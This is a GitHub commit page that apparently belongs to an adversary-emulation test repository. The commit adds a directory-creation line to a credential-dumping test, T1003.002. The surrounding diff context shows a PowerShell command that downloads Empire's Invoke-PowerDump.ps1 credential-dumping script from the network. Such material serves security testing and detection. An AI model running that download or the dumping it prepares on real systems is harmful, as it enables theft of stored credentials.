Skip to content

Commit

Permalink
Download Directory creation (#2543)
Browse files Browse the repository at this point in the history 
* Added ExternalPayloads dir creation

* Created ExternaPayloads Dir

Created ExternaPayloads Directory using powershell command

* Added External Payloads Dir

Added External Payloads Directory using a powershell command for all Procedures.

* Fixed ExternalPayload directory creation

Fixed ExternalPayload directory creation.  Got rid of the Split path

* Created External Payloads directory

Created External Payloads directory for procedure 14d55ca0-920e-4b44-8425-37eedd72b173

* Update T1003.002.yaml

Added ExternalPayloads directory creation PowerShell command for procedure 804f28fc-68fc-40da-b5a2-e9d0bce5c193

---------

Co-authored-by: Carrie Roberts <[email protected]>
  • Loading branch information
@antman1p @clr2of8
antman1p and clr2of8 authored Sep 25, 2023
1 parent d146373 commit a301206
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions atomics/T1003.002/T1003.002.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -93,6 +93,7 @@ atomic_tests:
- description: PowerDump script must exist on disk at specified location
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1} '
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
executor:
command: |-
Expand Down

0 comments on commit a301206

Please sign in to comment.